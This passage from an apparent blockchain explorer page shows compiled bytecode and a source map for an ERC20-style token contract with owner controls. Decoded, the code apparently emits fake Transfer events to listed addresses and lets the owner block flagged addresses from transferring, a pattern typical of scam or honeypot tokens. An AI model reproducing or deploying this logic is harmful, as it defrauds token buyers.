06111e7816111c1565b92915050565b6000819050919050565b611200816111ed565b811461120b57600080fd5b50565b60008135905061121d816111f7565b92915050565b6000806040838503121561123a57611239611185565b5b6000611248858286016111d8565b92505060206112598582860161120e565b9150509250929050565b60008115159050919050565b61127881611263565b82525050565b6000602082019050611293600083018461126f565b92915050565b6112a2816111ed565b82525050565b60006020820190506112bd6000830184611299565b92915050565b6000602082840312156112d9576112d8611185565b5b60006112e7848285016111d8565b91505092915050565b60008060006060848603121561130957611308611185565b5b6000611317868287016111d8565b9350506020611328868287016111d8565b92505060406113398682870161120e565b9150509250925092565b600060ff82169050919050565b61135981611343565b82525050565b60006020820190506113746000830184611350565b92915050565b611383816111af565b82525050565b600060208201905061139e600083018461137a565b92915050565b600080604083850312156113bb576113ba611185565b5b60006113c9858286016111d8565b92505060206113da858286016111d8565b9150509250929050565b600080fd5b600080fd5b600080fd5b60008083601f840112611409576114086113e4565b5b8235905067ffffffffffffffff811115611426576114256113e9565b5b602083019150836020820283011115611442576114416113ee565b5b9250929050565b600080602083850312156114605761145f611185565b5b600083013567ffffffffffffffff81111561147e5761147d61118a565b5b61148a858286016113f3565b92509250509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114dd57607f821691505b6020821081036114f0576114ef611496565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611530826111ed565b915061153b836111ed565b9250828201905080821115611553576115526114f6565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006115b56025836110de565b91506115c082611559565b604082019050919050565b600060208201905081810360008301526115e4816115a8565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000819050919050565b6000819050919050565b600061164961164461163f8461161a565b611624565b6111ed565b9050919050565b6116598161162e565b82525050565b60006020820190506116746000830184611650565b92915050565b6000611685826111ed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036116b7576116b66114f6565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061171e6026836110de565b9150611729826116c2565b604082019050919050565b6000602082019050818103600083015261174d81611711565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117b06024836110de565b91506117bb82611754565b604082019050919050565b600060208201905081810360008301526117df816117a3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118426022836110de565b915061184d826117e6565b604082019050919050565b6000602082019050818103600083015261187181611835565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118ae601d836110de565b91506118b982611878565b602082019050919050565b600060208201905081810360008301526118dd816118a1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119406025836110de565b915061194b826118e4565b604082019050919050565b6000602082019050818103600083015261196f81611933565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119d26023836110de565b91506119dd82611976565b604082019050919050565b60006020820190508181036000830152611a01816119c5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a646026836110de565b9150611a6f82611a08565b604082019050919050565b60006020820190508181036000830152611a9381611a57565b9050919050565b50565b6000611aaa6000836110de565b9150611ab582611a9a565b600082019050919050565b60006020820190508181036000830152611ad981611a9d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b166020836110de565b9150611b2182611ae0565b602082019050919050565b60006020820190508181036000830152611b4581611b09565b905091905056fea2646970667358221220c558dc3b389b6fdb107be4aa582acd013eac8a11308ead2e29919903dba12f3d64736f6c63430008120033
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a9059cbb11610071578063a9059cbb146102d0578063dd62ed3e14610300578063e96c389914610330578063efaf48d41461034c578063f2fde38b146103685761010b565b8063715018a61461025a5780638da5cb5b1461026457806395d89b4114610282578063a457c2d7146102a05761010b565b806323b872dd116100de57806323b872dd146101ac578063313ce567146101dc57806339509351146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e5780632163be8a1461017c575b600080fd5b610118610384565b6040516101259190611163565b60405180910390f35b61014860048036038101906101439190611223565b610416565b604051610155919061127e565b60405180910390f35b610166610439565b60405161017391906112a8565b60405180910390f35b610196600480360381019061019191906112c3565b610443565b6040516101a3919061127e565b60405180910390f35b6101c660048036038101906101c191906112f0565b610499565b6040516101d3919061127e565b60405180910390f35b6101e46104c8565b6040516101f1919061135f565b60405180910390f35b610214600480360381019061020f9190611223565b6104d1565b604051610221919061127e565b60405180910390f35b610244600480360381019061023f91906112c3565b610508565b60405161025191906112a8565b60405180910390f35b610262610551565b005b61026c610565565b6040516102799190611389565b60405180910390f35b61028a61058e565b6040516102979190611163565b60405180910390f35b6102ba60048036038101906102b59190611223565b610620565b6040516102c7919061127e565b60405180910390f35b6102ea60048036038101906102e59190611223565b610697565b6040516102f7919061127e565b60405180910390f35b61031a600480360381019061031591906113a4565b6106ba565b60405161032791906112a8565b60405180910390f35b61034a60048036038101906103459190611449565b610741565b005b61036660048036038101906103619190611449565b610884565b005b610382600480360381019061037d91906112c3565b610931565b005b606060068054610393906114c5565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906114c5565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216109b4565b905061042e8185856109bc565b600191505092915050565b6000600454905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000806104a46109b4565b90506104b1858285610b85565b6104bc858585610c11565b60019150509392505050565b60006012905090565b6000806104dc6109b4565b90506104fd8185856104ee85896106ba565b6104f89190611525565b6109bc565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610559610f87565b6105636000611005565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461059d906114c5565b80601f01602080910402602001604051908101604052809291908181526020018280546105c9906114c5565b80156106165780601f106105eb57610100808354040283529160200191610616565b820191906000526020600020905b8154815290600101906020018083116105f957829003601f168201915b5050505050905090565b60008061062b6109b4565b9050600061063982866106ba565b90508381101561067e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610675906115cb565b60405180910390fd5b61068b82868684036109bc565b60019250505092915050565b6000806106a26109b4565b90506106af818585610c11565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610749610f87565b60005b8282905081101561087f576001600260008585858181106107705761076f6115eb565b5b905060200201602081019061078591906112c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508282828181106107e9576107e86115eb565b5b90506020020160208101906107fe91906112c3565b73ffffffffffffffffffffffffffffffffffffffff163073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef69d3c21bcecceda1000000604051610864919061165f565b60405180910390a380806108779061167a565b91505061074c565b505050565b61088c610f87565b60005b8282905081101561092c576000600260008585858181106108b3576108b26115eb565b5b90506020020160208101906108c891906112c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806109249061167a565b91505061088f565b505050565b610939610f87565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099f90611734565b60405180910390fd5b6109b181611005565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a22906117c6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9190611858565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b7891906112a8565b60405180910390a3505050565b6000610b9184846106ba565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c0b5781811015610bfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf4906118c4565b60405180910390fd5b610c0a84848484036109bc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7790611956565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce6906119e8565b60405180910390fd5b610cfa8383836110c9565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7890611a7a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610eb55750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610f115760011515600560009054906101000a900460ff16151514610f10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0790611ac0565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f6e91906112a8565b60405180910390a3610f818484846110ce565b50505050565b610f8f6109b4565b73ffffffffffffffffffffffffffffffffffffffff16610fad610565565b73ffffffffffffffffffffffffffffffffffffffff1614611003576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ffa90611b2c565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561110d5780820151818401526020810190506110f2565b60008484015250505050565b6000601f19601f8301169050919050565b6000611135826110d3565b61113f81856110de565b935061114f8185602086016110ef565b61115881611119565b840191505092915050565b6000602082019050818103600083015261117d818461112a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111ba8261118f565b9050919050565b6111ca816111af565b81146111d557600080fd5b50565b6000813590506111e7816111c1565b92915050565b6000819050919050565b611200816111ed565b811461120b57600080fd5b50565b60008135905061121d816111f7565b92915050565b6000806040838503121561123a57611239611185565b5b6000611248858286016111d8565b92505060206112598582860161120e565b9150509250929050565b60008115159050919050565b61127881611263565b82525050565b6000602082019050611293600083018461126f565b92915050565b6112a2816111ed565b82525050565b60006020820190506112bd6000830184611299565b92915050565b6000602082840312156112d9576112d8611185565b5b60006112e7848285016111d8565b91505092915050565b60008060006060848603121561130957611308611185565b5b6000611317868287016111d8565b9350506020611328868287016111d8565b92505060406113398682870161120e565b9150509250925092565b600060ff82169050919050565b61135981611343565b82525050565b60006020820190506113746000830184611350565b92915050565b611383816111af565b82525050565b600060208201905061139e600083018461137a565b92915050565b600080604083850312156113bb576113ba611185565b5b60006113c9858286016111d8565b92505060206113da858286016111d8565b9150509250929050565b600080fd5b600080fd5b600080fd5b60008083601f840112611409576114086113e4565b5b8235905067ffffffffffffffff811115611426576114256113e9565b5b602083019150836020820283011115611442576114416113ee565b5b9250929050565b600080602083850312156114605761145f611185565b5b600083013567ffffffffffffffff81111561147e5761147d61118a565b5b61148a858286016113f3565b92509250509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114dd57607f821691505b6020821081036114f0576114ef611496565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611530826111ed565b915061153b836111ed565b9250828201905080821115611553576115526114f6565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006115b56025836110de565b91506115c082611559565b604082019050919050565b600060208201905081810360008301526115e4816115a8565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000819050919050565b6000819050919050565b600061164961164461163f8461161a565b611624565b6111ed565b9050919050565b6116598161162e565b82525050565b60006020820190506116746000830184611650565b92915050565b6000611685826111ed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036116b7576116b66114f6565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061171e6026836110de565b9150611729826116c2565b604082019050919050565b6000602082019050818103600083015261174d81611711565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117b06024836110de565b91506117bb82611754565b604082019050919050565b600060208201905081810360008301526117df816117a3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118426022836110de565b915061184d826117e6565b604082019050919050565b6000602082019050818103600083015261187181611835565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118ae601d836110de565b91506118b982611878565b602082019050919050565b600060208201905081810360008301526118dd816118a1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119406025836110de565b915061194b826118e4565b604082019050919050565b6000602082019050818103600083015261196f81611933565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119d26023836110de565b91506119dd82611976565b604082019050919050565b60006020820190508181036000830152611a01816119c5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a646026836110de565b9150611a6f82611a08565b604082019050919050565b60006020820190508181036000830152611a9381611a57565b9050919050565b50565b6000611aaa6000836110de565b9150611ab582611a9a565b600082019050919050565b60006020820190508181036000830152611ad981611a9d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b166020836110de565b9150611b2182611ae0565b602082019050919050565b60006020820190508181036000830152611b4581611b09565b905091905056fea2646970667358221220c558dc3b389b6fdb107be4aa582acd013eac8a11308ead2e29919903dba12f3d64736f6c63430008120033
Deployed Bytecode Sourcemap
21833:141:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8708:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11704:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10473:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10282:126;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12485:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9670:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13189:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10644:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5797:103;;;:::i;:::-;;5156:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8927:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13930:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10977:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11233:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9771:283;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10062:212;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6055:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8708:100;8762:13;8795:5;8788:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8708:100;:::o;11704:201::-;11787:4;11804:13;11820:12;:10;:12::i;:::-;11804:28;;11843:32;11852:5;11859:7;11868:6;11843:8;:32::i;:::-;11893:4;11886:11;;;11704:201;;;;:::o;10473:108::-;10534:7;10561:12;;10554:19;;10473:108;:::o;10282:126::-;10347:4;10371:18;:29;10390:9;10371:29;;;;;;;;;;;;;;;;;;;;;;;;;10364:36;;10282:126;;;:::o;12485:295::-;12616:4;12633:15;12651:12;:10;:12::i;:::-;12633:30;;12674:38;12690:4;12696:7;12705:6;12674:15;:38::i;:::-;12723:27;12733:4;12739:2;12743:6;12723:9;:27::i;:::-;12768:4;12761:11;;;12485:295;;;;;:::o;9670:93::-;9728:5;9753:2;9746:9;;9670:93;:::o;13189:238::-;13277:4;13294:13;13310:12;:10;:12::i;:::-;13294:28;;13333:64;13342:5;13349:7;13386:10;13358:25;13368:5;13375:7;13358:9;:25::i;:::-;:38;;;;:::i;:::-;13333:8;:64::i;:::-;13415:4;13408:11;;;13189:238;;;;:::o;10644:127::-;10718:7;10745:9;:18;10755:7;10745:18;;;;;;;;;;;;;;;;10738:25;;10644:127;;;:::o;5797:103::-;5042:13;:11;:13::i;:::-;5862:30:::1;5889:1;5862:18;:30::i;:::-;5797:103::o:0;5156:87::-;5202:7;5229:6;;;;;;;;;;;5222:13;;5156:87;:::o;8927:104::-;8983:13;9016:7;9009:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8927:104;:::o;13930:436::-;14023:4;14040:13;14056:12;:10;:12::i;:::-;14040:28;;14079:24;14106:25;14116:5;14123:7;14106:9;:25::i;:::-;14079:52;;14170:15;14150:16;:35;;14142:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14263:60;14272:5;14279:7;14307:15;14288:16;:34;14263:8;:60::i;:::-;14354:4;14347:11;;;;13930:436;;;;:::o;10977:193::-;11056:4;11073:13;11089:12;:10;:12::i;:::-;11073:28;;11112;11122:5;11129:2;11133:6;11112:9;:28::i;:::-;11158:4;11151:11;;;10977:193;;;;:::o;11233:151::-;11322:7;11349:11;:18;11361:5;11349:18;;;;;;;;;;;;;;;:27;11368:7;11349:27;;;;;;;;;;;;;;;;11342:34;;11233:151;;;;:::o;9771:283::-;5042:13;:11;:13::i;:::-;9864:9:::1;9859:188;9883:11;;:18;;9879:1;:22;9859:188;;;9960:4;9923:18;:34;9942:11;;9954:1;9942:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9923:34;;;;;;;;;;;;;;;;:41;;;;;;;;;;;;;;;;;;10008:11;;10020:1;10008:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9984:51;;10001:4;9984:51;;;10024:10;9984:51;;;;;;:::i;:::-;;;;;;;;9903:3;;;;;:::i;:::-;;;;9859:188;;;;9771:283:::0;;:::o;10062:212::-;5042:13;:11;:13::i;:::-;10154:9:::1;10149:118;10173:11;;:18;;10169:1;:22;10149:118;;;10250:5;10213:18;:34;10232:11;;10244:1;10232:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10213:34;;;;;;;;;;;;;;;;:42;;;;;;;;;;;;;;;;;;10193:3;;;;;:::i;:::-;;;;10149:118;;;;10062:212:::0;;:::o;6055:201::-;5042:13;:11;:13::i;:::-;6164:1:::1;6144:22;;:8;:22;;::::0;6136:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6220:28;6239:8;6220:18;:28::i;:::-;6055:201:::0;:::o;3865:98::-;3918:7;3945:10;3938:17;;3865:98;:::o;18072:380::-;18225:1;18208:19;;:5;:19;;;18200:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18306:1;18287:21;;:7;:21;;;18279:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18390:6;18360:11;:18;18372:5;18360:18;;;;;;;;;;;;;;;:27;18379:7;18360:27;;;;;;;;;;;;;;;:36;;;;18428:7;18412:32;;18421:5;18412:32;;;18437:6;18412:32;;;;;;:::i;:::-;;;;;;;;18072:380;;;:::o;18743:453::-;18878:24;18905:25;18915:5;18922:7;18905:9;:25::i;:::-;18878:52;;18965:17;18945:16;:37;18941:248;;19027:6;19007:16;:26;;18999:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19111:51;19120:5;19127:7;19155:6;19136:16;:25;19111:8;:51::i;:::-;18941:248;18867:329;18743:453;;;:::o;14836:955::-;14983:1;14967:18;;:4;:18;;;14959:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15060:1;15046:16;;:2;:16;;;15038:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15115:38;15136:4;15142:2;15146:6;15115:20;:38::i;:::-;15166:19;15188:9;:15;15198:4;15188:15;;;;;;;;;;;;;;;;15166:37;;15237:6;15222:11;:21;;15214:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15354:6;15340:11;:20;15322:9;:15;15332:4;15322:15;;;;;;;;;;;;;;;:38;;;;15557:6;15540:9;:13;15550:2;15540:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15589:18;:24;15608:4;15589:24;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;15617:18;:22;15636:2;15617:22;;;;;;;;;;;;;;;;;;;;;;;;;15589:50;15585:102;;;15678:4;15649:33;;:25;;;;;;;;;;;:33;;;15641:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;15585:102;15722:2;15707:26;;15716:4;15707:26;;;15726:6;15707:26;;;;;;:::i;:::-;;;;;;;;15746:37;15766:4;15772:2;15776:6;15746:19;:37::i;:::-;14948:843;14836:955;;;:::o;5321:132::-;5396:12;:10;:12::i;:::-;5385:23;;:7;:5;:7::i;:::-;:23;;;5377:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5321:132::o;6416:191::-;6490:16;6509:6;;;;;;;;;;;6490:25;;6535:8;6526:6;;:17;;;;;;;;;;;;;;;;;;6590:8;6559:40;;6580:8;6559:40;;;;;;;;;;;;6479:128;6416:191;:::o;20528:125::-;;;;:::o;19800:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:329::-;3857:6;3906:2;3894:9;3885:7;3881:23;3877:32;3874:119;;;3912:79;;:::i;:::-;3874:119;4032:1;4057:53;4102:7;4093:6;4082:9;4078:22;4057:53;:::i;:::-;4047:63;;4003:117;3798:329;;;;:::o;4133:619::-;4210:6;4218;4226;4275:2;4263:9;4254:7;4250:23;4246:32;4243:119;;;4281:79;;:::i;:::-;4243:119;4401:1;4426:53;4471:7;4462:6;4451:9;4447:22;4426:53;:::i;:::-;4416:63;;4372:117;4528:2;4554:53;4599:7;4590:6;4579:9;4575:22;4554:53;:::i;:::-;4544:63;;4499:118;4656:2;4682:53;4727:7;4718:6;4707:9;4703:22;4682:53;:::i;:::-;4672:63;;4627:118;4133:619;;;;;:::o;4758:86::-;4793:7;4833:4;4826:5;4822:16;4811:27;;4758:86;;;:::o;4850:112::-;4933:22;4949:5;4933:22;:::i;:::-;4928:3;4921:35;4850:112;;:::o;4968:214::-;5057:4;5095:2;5084:9;5080:18;5072:26;;5108:67;5172:1;5161:9;5157:17;5148:6;5108:67;:::i;:::-;4968:214;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:22;5944:53;:::i;:::-;5934:63;;5889:118;5540:474;;;;;:::o;6020:117::-;6129:1;6126;6119:12;6143:117;6252:1;6249;6242:12;6266:117;6375:1;6372;6365:12;6406:568;6479:8;6489:6;6539:3;6532:4;6524:6;6520:17;6516:27;6506:122;;6547:79;;:::i;:::-;6506:122;6660:6;6647:20;6637:30;;6690:18;6682:6;6679:30;6676:117;;;6712:79;;:::i;:::-;6676:117;6826:4;6818:6;6814:17;6802:29;;6880:3;6872:4;6864:6;6860:17;6850:8;6846:32;6843:41;6840:128;;;6887:79;;:::i